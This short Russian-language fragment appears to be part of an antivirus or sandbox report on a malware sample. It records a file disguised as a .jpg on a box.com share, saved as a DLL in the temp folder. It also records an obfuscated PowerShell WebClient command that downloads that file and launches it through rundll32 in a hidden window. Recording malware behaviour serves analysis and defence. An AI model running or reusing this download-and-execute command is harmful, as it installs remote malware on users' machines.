Техническая информация
- https://luanjoaquimyuri777.box.com/shared/static/gfyyk4758zen4be1owf3zr536dm644wg.jpg как %temp%\qjtbvgdlm_user_nzrje.dll
- DNS ASK lu######uimyuri777.box.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (nEw-objECt sYstEm.nEt.wEbCliEnt).downloadfilE('""https://luanjoaquimyuri777.box.com/shared/static/gfyyk4758zen4be1owf3zr536dm644wg.jpg','%TEMP%\qjtbvgdlm_user_nzrje.dll');start-proCEss rundll3...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %TEMP%\qjtbvgdlm_user_nzrje.dll starter